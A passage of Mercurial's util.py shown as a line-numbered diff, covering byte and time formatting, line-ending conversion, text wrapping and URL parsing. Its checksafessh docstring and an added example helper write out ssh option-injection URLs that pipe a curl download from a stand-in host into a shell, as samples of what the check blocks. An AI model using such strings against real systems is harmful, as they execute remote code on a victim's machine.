2387 2609 if abs(count) >= divisor * multiplier:
2388 2610 return format % (count / float(divisor))
2389 2611 return unittable[-1][2] % count
2390 2612
2391 2613 return go
2392 2614
2393 2615 def processlinerange(fromline, toline):
2394 2616 """Check that linerange <fromline>:<toline> makes sense and return a
2395 2617 0-based range.
2396 2618
2397 2619 >>> processlinerange(10, 20)
2398 2620 (9, 20)
2399 2621 >>> processlinerange(2, 1)
2400 2622 Traceback (most recent call last):
2401 2623 ...
2402 2624 ParseError: line range must be positive
2403 2625 >>> processlinerange(0, 5)
2404 2626 Traceback (most recent call last):
2405 2627 ...
2406 2628 ParseError: fromline must be strictly positive
2407 2629 """
2408 2630 if toline - fromline < 0:
2409 2631 raise error.ParseError(_("line range must be positive"))
2410 2632 if fromline < 1:
2411 2633 raise error.ParseError(_("fromline must be strictly positive"))
2412 2634 return fromline - 1, toline
2413 2635
2414 2636 bytecount = unitcountfn(
2415 2637 (100, 1 << 30, _('%.0f GB')),
2416 2638 (10, 1 << 30, _('%.1f GB')),
2417 2639 (1, 1 << 30, _('%.2f GB')),
2418 2640 (100, 1 << 20, _('%.0f MB')),
2419 2641 (10, 1 << 20, _('%.1f MB')),
2420 2642 (1, 1 << 20, _('%.2f MB')),
2421 2643 (100, 1 << 10, _('%.0f KB')),
2422 2644 (10, 1 << 10, _('%.1f KB')),
2423 2645 (1, 1 << 10, _('%.2f KB')),
2424 2646 (1, 1, _('%.0f bytes')),
2425 2647 )
2426 2648
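# Illustrative examples (not part of this module): bytecount picks the
# first row of the table above whose threshold the value meets, so display
# precision drops as magnitude grows:
#
#   bytecount(100)         # -> '100 bytes'
#   bytecount(2252)        # -> '2.20 KB'
#   bytecount(150 << 20)   # -> '150 MB'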
2427 2649 # Matches a single EOL which can either be a CRLF where repeated CR
2428 2650 # are removed or a LF. We do not care about old Macintosh files, so a
2429 2651 # stray CR is an error.
2430 2652 _eolre = remod.compile(br'\r*\n')
2431 2653
2432 2654 def tolf(s):
2433 2655 return _eolre.sub('\n', s)
2434 2656
2435 2657 def tocrlf(s):
2436 2658 return _eolre.sub('\r\n', s)
2437 2659
2438 2660 if pycompat.oslinesep == '\r\n':
2439 2661 tonativeeol = tocrlf
2440 2662 fromnativeeol = tolf
2441 2663 else:
2442 2664 tonativeeol = pycompat.identity
2443 2665 fromnativeeol = pycompat.identity
2444 2666
2445 2667 def escapestr(s):
2446 2668 # call underlying function of s.encode('string_escape') directly for
2447 2669 # Python 3 compatibility
2448 2670 return codecs.escape_encode(s)[0]
2449 2671
2450 2672 def unescapestr(s):
2451 2673 return codecs.escape_decode(s)[0]
2452 2674
2453 2675 def forcebytestr(obj):
2454 2676 """Portably format an arbitrary object (e.g. exception) into a byte
2455 2677 string."""
2456 2678 try:
2457 2679 return pycompat.bytestr(obj)
2458 2680 except UnicodeEncodeError:
2459 2681 # non-ascii string, may be lossy
2460 2682 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2461 2683
2462 2684 def uirepr(s):
2463 2685 # Avoid double backslash in Windows path repr()
2464 2686 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2465 2687
2466 2688 # delay import of textwrap
2467 2689 def MBTextWrapper(**kwargs):
2468 2690 class tw(textwrap.TextWrapper):
2469 2691 """
2470 2692 Extend TextWrapper for width-awareness.
2471 2693
2472 2694 Neither the number of 'bytes' in any encoding nor the number of
2473 2695 'characters' is appropriate for calculating terminal columns.
2474 2696
2475 2697 The original TextWrapper implementation uses the built-in 'len()'
2476 2698 directly, so overriding is needed to use the width of each character.
2477 2699
2478 2700 In addition, characters classified as 'ambiguous' width are
2479 2701 treated as wide in East Asian locales, but as narrow elsewhere.
2480 2702
2481 2703 This requires a user decision to determine the width of such characters.
2482 2704 """
2483 2705 def _cutdown(self, ucstr, space_left):
2484 2706 l = 0
2485 2707 colwidth = encoding.ucolwidth
2486 2708 for i in xrange(len(ucstr)):
2487 2709 l += colwidth(ucstr[i])
2488 2710 if space_left < l:
2489 2711 return (ucstr[:i], ucstr[i:])
2490 2712 return ucstr, ''
2491 2713
2492 2714 # overriding of base class
2493 2715 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2494 2716 space_left = max(width - cur_len, 1)
2495 2717
2496 2718 if self.break_long_words:
2497 2719 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2498 2720 cur_line.append(cut)
2499 2721 reversed_chunks[-1] = res
2500 2722 elif not cur_line:
2501 2723 cur_line.append(reversed_chunks.pop())
2502 2724
2503 2725 # this overriding code is imported from TextWrapper of Python 2.6
2504 2726 # to calculate columns of string by 'encoding.ucolwidth()'
2505 2727 def _wrap_chunks(self, chunks):
2506 2728 colwidth = encoding.ucolwidth
2507 2729
2508 2730 lines = []
2509 2731 if self.width <= 0:
2510 2732 raise ValueError("invalid width %r (must be > 0)" % self.width)
2511 2733
2512 2734 # Arrange in reverse order so items can be efficiently popped
2513 2735 # from a stack of chunks.
2514 2736 chunks.reverse()
2515 2737
2516 2738 while chunks:
2517 2739
2518 2740 # Start the list of chunks that will make up the current line.
2519 2741 # cur_len is just the length of all the chunks in cur_line.
2520 2742 cur_line = []
2521 2743 cur_len = 0
2522 2744
2523 2745 # Figure out which static string will prefix this line.
2524 2746 if lines:
2525 2747 indent = self.subsequent_indent
2526 2748 else:
2527 2749 indent = self.initial_indent
2528 2750
2529 2751 # Maximum width for this line.
2530 2752 width = self.width - len(indent)
2531 2753
2532 2754 # First chunk on line is whitespace -- drop it, unless this
2533 2755 # is the very beginning of the text (i.e. no lines started yet).
2534 2756 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2535 2757 del chunks[-1]
2536 2758
2537 2759 while chunks:
2538 2760 l = colwidth(chunks[-1])
2539 2761
2540 2762 # Can at least squeeze this chunk onto the current line.
2541 2763 if cur_len + l <= width:
2542 2764 cur_line.append(chunks.pop())
2543 2765 cur_len += l
2544 2766
2545 2767 # Nope, this line is full.
2546 2768 else:
2547 2769 break
2548 2770
2549 2771 # The current line is full, and the next chunk is too big to
2550 2772 # fit on *any* line (not just this one).
2551 2773 if chunks and colwidth(chunks[-1]) > width:
2552 2774 self._handle_long_word(chunks, cur_line, cur_len, width)
2553 2775
2554 2776 # If the last chunk on this line is all whitespace, drop it.
2555 2777 if (self.drop_whitespace and
2556 2778 cur_line and cur_line[-1].strip() == r''):
2557 2779 del cur_line[-1]
2558 2780
2559 2781 # Convert current line back to a string and store it in list
2560 2782 # of all lines (return value).
2561 2783 if cur_line:
2562 2784 lines.append(indent + r''.join(cur_line))
2563 2785
2564 2786 return lines
2565 2787
2566 2788 global MBTextWrapper
2567 2789 MBTextWrapper = tw
2568 2790 return tw(**kwargs)
2569 2791
2570 2792 def wrap(line, width, initindent='', hangindent=''):
2571 2793 maxindent = max(len(hangindent), len(initindent))
2572 2794 if width <= maxindent:
2573 2795 # adjust for weird terminal size
2574 2796 width = max(78, maxindent + 1)
2575 2797 line = line.decode(pycompat.sysstr(encoding.encoding),
2576 2798 pycompat.sysstr(encoding.encodingmode))
2577 2799 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2578 2800 pycompat.sysstr(encoding.encodingmode))
2579 2801 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2580 2802 pycompat.sysstr(encoding.encodingmode))
2581 2803 wrapper = MBTextWrapper(width=width,
2582 2804 initial_indent=initindent,
2583 2805 subsequent_indent=hangindent)
2584 2806 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2585 2807
2586 2808 if (pyplatform.python_implementation() == 'CPython' and
2587 2809 sys.version_info < (3, 0)):
2588 2810 # There is an issue in CPython that some IO methods do not handle EINTR
2589 2811 # correctly. The following table shows what CPython version (and functions)
2590 2812 # are affected (buggy: has the EINTR bug, okay: otherwise):
2591 2813 #
2592 2814 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2593 2815 # --------------------------------------------------
2594 2816 # fp.__iter__ | buggy | buggy | okay
2595 2817 # fp.read* | buggy | okay [1] | okay
2596 2818 #
2597 2819 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2598 2820 #
2599 2821 # Here we work around the EINTR issue for fileobj.__iter__. Other methods
2600 2822 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2601 2823 #
2602 2824 # Although we can work around the EINTR issue for fp.__iter__, it is slower:
2603 2825 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2604 2826 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2605 2827 # fp.__iter__ but not other fp.read* methods.
2606 2828 #
2607 2829 # On modern systems like Linux, the "read" syscall cannot be interrupted
2608 2830 # when reading "fast" files like on-disk files. So the EINTR issue only
2609 2831 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2610 2832 # files approximately as "fast" files and use the fast (unsafe) code path,
2611 2833 # to minimize the performance impact.
2612 2834 if sys.version_info >= (2, 7, 4):
2613 2835 # fp.readline deals with EINTR correctly, use it as a workaround.
2614 2836 def _safeiterfile(fp):
2615 2837 return iter(fp.readline, '')
2616 2838 else:
2617 2839 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2618 2840 # note: this may block longer than necessary because of bufsize.
2619 2841 def _safeiterfile(fp, bufsize=4096):
2620 2842 fd = fp.fileno()
2621 2843 line = ''
2622 2844 while True:
2623 2845 try:
2624 2846 buf = os.read(fd, bufsize)
2625 2847 except OSError as ex:
2626 2848 # os.read only raises EINTR before any data is read
2627 2849 if ex.errno == errno.EINTR:
2628 2850 continue
2629 2851 else:
2630 2852 raise
2631 2853 line += buf
2632 2854 if '\n' in buf:
2633 2855 splitted = line.splitlines(True)
2634 2856 line = ''
2635 2857 for l in splitted:
2636 2858 if l[-1] == '\n':
2637 2859 yield l
2638 2860 else:
2639 2861 line = l
2640 2862 if not buf:
2641 2863 break
2642 2864 if line:
2643 2865 yield line
2644 2866
2645 2867 def iterfile(fp):
2646 2868 fastpath = True
2647 2869 if type(fp) is file:
2648 2870 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2649 2871 if fastpath:
2650 2872 return fp
2651 2873 else:
2652 2874 return _safeiterfile(fp)
2653 2875 else:
2654 2876 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2655 2877 def iterfile(fp):
2656 2878 return fp
2657 2879
2658 2880 def iterlines(iterator):
2659 2881 for chunk in iterator:
2660 2882 for line in chunk.splitlines():
2661 2883 yield line
2662 2884
2663 2885 def expandpath(path):
2664 2886 return os.path.expanduser(os.path.expandvars(path))
2665 2887
2666 2888 def hgcmd():
2667 2889 """Return the command used to execute current hg
2668 2890
2669 2891 This is different from hgexecutable() because on Windows we want
2670 2892 to avoid things like batch files opening new shell windows, so we
2671 2893 get either the python call or current executable.
2672 2894 """
2673 2895 if mainfrozen():
2674 2896 if getattr(sys, 'frozen', None) == 'macosx_app':
2675 2897 # Env variable set by py2app
2676 2898 return [encoding.environ['EXECUTABLEPATH']]
2677 2899 else:
2678 2900 return [pycompat.sysexecutable]
2679 2901 return gethgcmd()
2680 2902
2681 2903 def rundetached(args, condfn):
2682 2904 """Execute the argument list in a detached process.
2683 2905
2684 2906 condfn is a callable which is called repeatedly and should return
2685 2907 True once the child process is known to have started successfully.
2686 2908 At this point, the child process PID is returned. If the child
2687 2909 process fails to start or finishes before condfn() evaluates to
2688 2910 True, return -1.
2689 2911 """
2690 2912 # Windows case is easier because the child process is either
2691 2913 # successfully starting and validating the condition or exiting
2692 2914 # on failure. We just poll on its PID. On Unix, if the child
2693 2915 # process fails to start, it will be left in a zombie state until
2694 2916 the parent waits on it, which we cannot do since we expect a long
2695 2917 # running process on success. Instead we listen for SIGCHLD telling
2696 2918 # us our child process terminated.
2697 2919 terminated = set()
2698 2920 def handler(signum, frame):
2699 2921 terminated.add(os.wait())
2700 2922 prevhandler = None
2701 2923 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2702 2924 if SIGCHLD is not None:
2703 2925 prevhandler = signal.signal(SIGCHLD, handler)
2704 2926 try:
2705 2927 pid = spawndetached(args)
2706 2928 while not condfn():
2707 2929 if ((pid in terminated or not testpid(pid))
2708 2930 and not condfn()):
2709 2931 return -1
2710 2932 time.sleep(0.1)
2711 2933 return pid
2712 2934 finally:
2713 2935 if prevhandler is not None:
2714 2936 signal.signal(signal.SIGCHLD, prevhandler)
2715 2937
2716 2938 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2717 2939 """Return the result of interpolating items in the mapping into string s.
2718 2940
2719 2941 prefix is a single character string, or a two character string with
2720 2942 a backslash as the first character if the prefix needs to be escaped in
2721 2943 a regular expression.
2722 2944
2723 2945 fn is an optional function that will be applied to the replacement text
2724 2946 just before replacement.
2725 2947
2726 2948 escape_prefix is an optional flag that allows using doubled prefix for
2727 2949 its escaping.
2728 2950 """
2729 2951 fn = fn or (lambda s: s)
2730 2952 patterns = '|'.join(mapping.keys())
2731 2953 if escape_prefix:
2732 2954 patterns += '|' + prefix
2733 2955 if len(prefix) > 1:
2734 2956 prefix_char = prefix[1:]
2735 2957 else:
2736 2958 prefix_char = prefix
2737 2959 mapping[prefix_char] = prefix_char
2738 2960 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2739 2961 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2740 2962
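# Illustrative usage sketch (the mapping and input string are hypothetical):
#
#   mapping = {b'H': b'1ec6e1ba79a5'}
#   interpolate(b'%', mapping, b'rev %H, literal %%H', escape_prefix=True)
#   # -> b'rev 1ec6e1ba79a5, literal %H'
#
# With escape_prefix=True, a doubled prefix ('%%') collapses to a literal
# '%' instead of being treated as a substitution.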
2741 2963 def getport(port):
2742 2964 """Return the port for a given network service.
2743 2965
2744 2966 If port is an integer, it's returned as is. If it's a string, it's
2745 2967 looked up using socket.getservbyname(). If there's no matching
2746 2968 service, error.Abort is raised.
2747 2969 """
2748 2970 try:
2749 2971 return int(port)
2750 2972 except ValueError:
2751 2973 pass
2752 2974
2753 2975 try:
2754 2976 return socket.getservbyname(pycompat.sysstr(port))
2755 2977 except socket.error:
2756 2978 raise Abort(_("no port number associated with service '%s'") % port)
2757 2979
2758 2980 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2759 2981 '0': False, 'no': False, 'false': False, 'off': False,
2760 2982 'never': False}
2761 2983
2762 2984 def parsebool(s):
2763 2985 """Parse s into a boolean.
2764 2986
2765 2987 If s is not a valid boolean, returns None.
2766 2988 """
2767 2989 return _booleans.get(s.lower(), None)
2768 2990
2769 2991 _hextochr = dict((a + b, chr(int(a + b, 16)))
2770 2992 for a in string.hexdigits for b in string.hexdigits)
2771 2993
2772 2994 class url(object):
2773 2995 r"""Reliable URL parser.
2774 2996
2775 2997 This parses URLs and provides attributes for the following
2776 2998 components:
2777 2999
2778 3000 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2779 3001
2780 3002 Missing components are set to None. The only exception is
2781 3003 fragment, which is set to '' if present but empty.
2782 3004
2783 3005 If parsefragment is False, fragment is included in query. If
2784 3006 parsequery is False, query is included in path. If both are
2785 3007 False, both fragment and query are included in path.
2786 3008
2787 3009 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2788 3010
2789 3011 Note that for backward compatibility reasons, bundle URLs do not
2790 3012 take host names. That means 'bundle://../' has a path of '../'.
2791 3013
2792 3014 Examples:
2793 3015
2794 3016 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2795 3017 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2796 3018 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2797 3019 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2798 3020 >>> url(b'file:///home/joe/repo')
2799 3021 <url scheme: 'file', path: '/home/joe/repo'>
2800 3022 >>> url(b'file:///c:/temp/foo/')
2801 3023 <url scheme: 'file', path: 'c:/temp/foo/'>
2802 3024 >>> url(b'bundle:foo')
2803 3025 <url scheme: 'bundle', path: 'foo'>
2804 3026 >>> url(b'bundle://../foo')
2805 3027 <url scheme: 'bundle', path: '../foo'>
2806 3028 >>> url(br'c:\foo\bar')
2807 3029 <url path: 'c:\\foo\\bar'>
2808 3030 >>> url(br'\\blah\blah\blah')
2809 3031 <url path: '\\\\blah\\blah\\blah'>
2810 3032 >>> url(br'\\blah\blah\blah#baz')
2811 3033 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2812 3034 >>> url(br'file:///C:\users\me')
2813 3035 <url scheme: 'file', path: 'C:\\users\\me'>
2814 3036
2815 3037 Authentication credentials:
2816 3038
2817 3039 >>> url(b'ssh://joe:xyz@x/repo')
2818 3040 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2819 3041 >>> url(b'ssh://joe@x/repo')
2820 3042 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2821 3043
2822 3044 Query strings and fragments:
2823 3045
2824 3046 >>> url(b'http://host/a?b#c')
2825 3047 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2826 3048 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2827 3049 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2828 3050
2829 3051 Empty path:
2830 3052
2831 3053 >>> url(b'')
2832 3054 <url path: ''>
2833 3055 >>> url(b'#a')
2834 3056 <url path: '', fragment: 'a'>
2835 3057 >>> url(b'http://host/')
2836 3058 <url scheme: 'http', host: 'host', path: ''>
2837 3059 >>> url(b'http://host/#a')
2838 3060 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2839 3061
2840 3062 Only scheme:
2841 3063
2842 3064 >>> url(b'http:')
2843 3065 <url scheme: 'http'>
2844 3066 """
2845 3067
2846 3068 _safechars = "!~*'()+"
2847 3069 _safepchars = "/!~*'()+:\\"
2848 3070 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2849 3071
2850 3072 def __init__(self, path, parsequery=True, parsefragment=True):
2851 3073 # We slowly chomp away at path until we have only the path left
2852 3074 self.scheme = self.user = self.passwd = self.host = None
2853 3075 self.port = self.path = self.query = self.fragment = None
2854 3076 self._localpath = True
2855 3077 self._hostport = ''
2856 3078 self._origpath = path
2857 3079
2858 3080 if parsefragment and '#' in path:
2859 3081 path, self.fragment = path.split('#', 1)
2860 3082
2861 3083 # special case for Windows drive letters and UNC paths
2862 3084 if hasdriveletter(path) or path.startswith('\\\\'):
2863 3085 self.path = path
2864 3086 return
2865 3087
2866 3088 # For compatibility reasons, we can't handle bundle paths as
2867 3089 # normal URLS
2868 3090 if path.startswith('bundle:'):
2869 3091 self.scheme = 'bundle'
2870 3092 path = path[7:]
2871 3093 if path.startswith('//'):
2872 3094 path = path[2:]
2873 3095 self.path = path
2874 3096 return
2875 3097
2876 3098 if self._matchscheme(path):
2877 3099 parts = path.split(':', 1)
2878 3100 if parts[0]:
2879 3101 self.scheme, path = parts
2880 3102 self._localpath = False
2881 3103
2882 3104 if not path:
2883 3105 path = None
2884 3106 if self._localpath:
2885 3107 self.path = ''
2886 3108 return
2887 3109 else:
2888 3110 if self._localpath:
2889 3111 self.path = path
2890 3112 return
2891 3113
2892 3114 if parsequery and '?' in path:
2893 3115 path, self.query = path.split('?', 1)
2894 3116 if not path:
2895 3117 path = None
2896 3118 if not self.query:
2897 3119 self.query = None
2898 3120
2899 3121 # // is required to specify a host/authority
2900 3122 if path and path.startswith('//'):
2901 3123 parts = path[2:].split('/', 1)
2902 3124 if len(parts) > 1:
2903 3125 self.host, path = parts
2904 3126 else:
2905 3127 self.host = parts[0]
2906 3128 path = None
2907 3129 if not self.host:
2908 3130 self.host = None
2909 3131 # path of file:///d is /d
2910 3132 # path of file:///d:/ is d:/, not /d:/
2911 3133 if path and not hasdriveletter(path):
2912 3134 path = '/' + path
2913 3135
2914 3136 if self.host and '@' in self.host:
2915 3137 self.user, self.host = self.host.rsplit('@', 1)
2916 3138 if ':' in self.user:
2917 3139 self.user, self.passwd = self.user.split(':', 1)
2918 3140 if not self.host:
2919 3141 self.host = None
2920 3142
2921 3143 # Don't split on colons in IPv6 addresses without ports
2922 3144 if (self.host and ':' in self.host and
2923 3145 not (self.host.startswith('[') and self.host.endswith(']'))):
2924 3146 self._hostport = self.host
2925 3147 self.host, self.port = self.host.rsplit(':', 1)
2926 3148 if not self.host:
2927 3149 self.host = None
2928 3150
2929 3151 if (self.host and self.scheme == 'file' and
2930 3152 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2931 3153 raise Abort(_('file:// URLs can only refer to localhost'))
2932 3154
2933 3155 self.path = path
2934 3156
2935 3157 # leave the query string escaped
2936 3158 for a in ('user', 'passwd', 'host', 'port',
2937 3159 'path', 'fragment'):
2938 3160 v = getattr(self, a)
2939 3161 if v is not None:
2940 3162 setattr(self, a, urlreq.unquote(v))
2941 3163
2942 3164 @encoding.strmethod
2943 3165 def __repr__(self):
2944 3166 attrs = []
2945 3167 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2946 3168 'query', 'fragment'):
2947 3169 v = getattr(self, a)
2948 3170 if v is not None:
2949 3171 attrs.append('%s: %r' % (a, v))
2950 3172 return '<url %s>' % ', '.join(attrs)
2951 3173
2952 3174 def __bytes__(self):
2953 3175 r"""Join the URL's components back into a URL string.
2954 3176
2955 3177 Examples:
2956 3178
2957 3179 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2958 3180 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2959 3181 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2960 3182 'http://user:pw@host:80/?foo=bar&baz=42'
2961 3183 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2962 3184 'http://user:pw@host:80/?foo=bar%3dbaz'
2963 3185 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2964 3186 'ssh://user:pw@[::1]:2200//home/joe#'
2965 3187 >>> bytes(url(b'http://localhost:80//'))
2966 3188 'http://localhost:80//'
2967 3189 >>> bytes(url(b'http://localhost:80/'))
2968 3190 'http://localhost:80/'
2969 3191 >>> bytes(url(b'http://localhost:80'))
2970 3192 'http://localhost:80/'
2971 3193 >>> bytes(url(b'bundle:foo'))
2972 3194 'bundle:foo'
2973 3195 >>> bytes(url(b'bundle://../foo'))
2974 3196 'bundle:../foo'
2975 3197 >>> bytes(url(b'path'))
2976 3198 'path'
2977 3199 >>> bytes(url(b'file:///tmp/foo/bar'))
2978 3200 'file:///tmp/foo/bar'
2979 3201 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2980 3202 'file:///c:/tmp/foo/bar'
2981 3203 >>> print(url(br'bundle:foo\bar'))
2982 3204 bundle:foo\bar
2983 3205 >>> print(url(br'file:///D:\data\hg'))
2984 3206 file:///D:\data\hg
2985 3207 """
2986 3208 if self._localpath:
2987 3209 s = self.path
2988 3210 if self.scheme == 'bundle':
2989 3211 s = 'bundle:' + s
2990 3212 if self.fragment:
2991 3213 s += '#' + self.fragment
2992 3214 return s
2993 3215
2994 3216 s = self.scheme + ':'
2995 3217 if self.user or self.passwd or self.host:
2996 3218 s += '//'
2997 3219 elif self.scheme and (not self.path or self.path.startswith('/')
2998 3220 or hasdriveletter(self.path)):
2999 3221 s += '//'
3000 3222 if hasdriveletter(self.path):
3001 3223 s += '/'
3002 3224 if self.user:
3003 3225 s += urlreq.quote(self.user, safe=self._safechars)
3004 3226 if self.passwd:
3005 3227 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3006 3228 if self.user or self.passwd:
3007 3229 s += '@'
3008 3230 if self.host:
3009 3231 if not (self.host.startswith('[') and self.host.endswith(']')):
3010 3232 s += urlreq.quote(self.host)
3011 3233 else:
3012 3234 s += self.host
3013 3235 if self.port:
3014 3236 s += ':' + urlreq.quote(self.port)
3015 3237 if self.host:
3016 3238 s += '/'
3017 3239 if self.path:
3018 3240 # TODO: similar to the query string, we should not unescape the
3019 3241 # path when we store it, the path might contain '%2f' = '/',
3020 3242 # which we should *not* escape.
3021 3243 s += urlreq.quote(self.path, safe=self._safepchars)
3022 3244 if self.query:
3023 3245 # we store the query in escaped form.
3024 3246 s += '?' + self.query
3025 3247 if self.fragment is not None:
3026 3248 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3027 3249 return s
3028 3250
3029 3251 __str__ = encoding.strmethod(__bytes__)
3030 3252
3031 3253 def authinfo(self):
3032 3254 user, passwd = self.user, self.passwd
3033 3255 try:
3034 3256 self.user, self.passwd = None, None
3035 3257 s = bytes(self)
3036 3258 finally:
3037 3259 self.user, self.passwd = user, passwd
3038 3260 if not self.user:
3039 3261 return (s, None)
3040 3262 # authinfo[1] is passed to urllib2 password manager, and its
3041 3263 # URIs must not contain credentials. The host is passed in the
3042 3264 # URIs list because Python < 2.4.3 uses only that to search for
3043 3265 # a password.
3044 3266 return (s, (None, (s, self.host),
3045 3267 self.user, self.passwd or ''))
3046 3268
3047 3269 def isabs(self):
3048 3270 if self.scheme and self.scheme != 'file':
3049 3271 return True # remote URL
3050 3272 if hasdriveletter(self.path):
3051 3273 return True # absolute for our purposes - can't be joined()
3052 3274 if self.path.startswith(br'\\'):
3053 3275 return True # Windows UNC path
3054 3276 if self.path.startswith('/'):
3055 3277 return True # POSIX-style
3056 3278 return False
3057 3279
3058 3280 def localpath(self):
3059 3281 if self.scheme == 'file' or self.scheme == 'bundle':
3060 3282 path = self.path or '/'
3061 3283 # For Windows, we need to promote hosts containing drive
3062 3284 # letters to paths with drive letters.
3063 3285 if hasdriveletter(self._hostport):
3064 3286 path = self._hostport + '/' + self.path
3065 3287 elif (self.host is not None and self.path
3066 3288 and not hasdriveletter(path)):
3067 3289 path = '/' + path
3068 3290 return path
3069 3291 return self._origpath
3070 3292
3071 3293 def islocal(self):
3072 3294 '''whether localpath will return something that posixfile can open'''
3073 3295 return (not self.scheme or self.scheme == 'file'
3074 3296 or self.scheme == 'bundle')
3075 3297
3076 3298 def hasscheme(path):
3077 3299 return bool(url(path).scheme)
3078 3300
3079 3301 def hasdriveletter(path):
3080 3302 return path and path[1:2] == ':' and path[0:1].isalpha()
3081 3303
3082 3304 def urllocalpath(path):
3083 3305 return url(path, parsequery=False, parsefragment=False).localpath()
3084 3306
3085 3307 def checksafessh(path):
3086 3308 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3087 3309
3088 3310 This is a sanity check for ssh urls. ssh will parse the first item as
3089 3311 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3090 3312 Let's prevent these potentially exploited urls entirely and warn the
3091 3313 user.
3092 3314
3093 3315 Raises an error.Abort when the url is unsafe.
3094 3316 """
3095 3317 path = urlreq.unquote(path)
3096 3318 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3097 3319 raise error.Abort(_('potentially unsafe url: %r') %
3098 3320 (path,))
3099 3321
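# A self-contained sketch of the same check for readers outside this
# module; the helper name and the Python 3 stdlib import are
# illustrative assumptions, not part of Mercurial's API:

def _unsafesshurlexample(path):
    """Sketch: does `path` look like an ssh option-injection url?

    >>> _unsafesshurlexample('ssh://-oProxyCommand=curl%20evil.sh|sh/x')
    True
    >>> _unsafesshurlexample('ssh://user@example.com/repo')
    False
    """
    from urllib.parse import unquote  # assumes Python 3
    path = unquote(path)
    return path.startswith('ssh://-') or path.startswith('svn+ssh://-')
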
3100 3322 def hidepassword(u):
3101 3323 '''hide user credential in a url string'''
3102 3324 u = url(u)
3103 3325 if u.passwd:
3104 3326 u.passwd = '***'
3105 3327 return bytes(u)
3106 3328
3107 3329 def removeauth(u):
3108 3330 '''remove all authentication information from a url string'''
3109 3331 u = url(u)
3110 3332 u.user = u.passwd = None
3111 3333 return bytes(u)
3112 3334
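# Usage sketch for the two helpers above (byte-literal inputs match the
# rest of this module; the output shown is what the url class's
# serialization produces for a typical http url):
#
#   >>> hidepassword(b'http://user:secret@example.com/repo')
#   'http://user:***@example.com/repo'
#   >>> removeauth(b'http://user:secret@example.com/repo')
#   'http://example.com/repo'
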
3113 3335 timecount = unitcountfn(
3114 3336 (1, 1e3, _('%.0f s')),
3115 3337 (100, 1, _('%.1f s')),
3116 3338 (10, 1, _('%.2f s')),
3117 3339 (1, 1, _('%.3f s')),
3118 3340 (100, 0.001, _('%.1f ms')),
3119 3341 (10, 0.001, _('%.2f ms')),
3120 3342 (1, 0.001, _('%.3f ms')),
3121 3343 (100, 0.000001, _('%.1f us')),
3122 3344 (10, 0.000001, _('%.2f us')),
3123 3345 (1, 0.000001, _('%.3f us')),
3124 3346 (100, 0.000000001, _('%.1f ns')),
3125 3347 (10, 0.000000001, _('%.2f ns')),
3126 3348 (1, 0.000000001, _('%.3f ns')),
3127 3349 )
3128 3350
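# unitcountfn() (defined earlier in this file) walks the rows above in
# order and renders the value with the first (factor, divisor, format)
# row whose threshold it meets. A minimal standalone sketch of that
# selection logic (illustrative only, not the real helper):

def _unitcountexample(count, table):
    """Render `count` using the first matching row of `table`.

    >>> _unitcountexample(0.0042, [(1, 1, '%.3f s'), (1, 0.001, '%.3f ms')])
    '4.200 ms'
    """
    for factor, divisor, fmt in table:
        if abs(count) >= factor * divisor:
            return fmt % (count / divisor)
    return table[-1][2] % (count / table[-1][1])
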
3129 3351 _timenesting = [0]
3130 3352
3131 3353 def timed(func):
3132 3354 '''Report the execution time of a function call to stderr.
3133 3355
3134 3356 During development, use as a decorator when you need to measure
3135 3357 the cost of a function, e.g. as follows:
3136 3358
3137 3359 @util.timed
3138 3360 def foo(a, b, c):
3139 3361 pass
3140 3362 '''
3141 3363
3142 3364 def wrapper(*args, **kwargs):
3143 3365 start = timer()
3144 3366 indent = 2
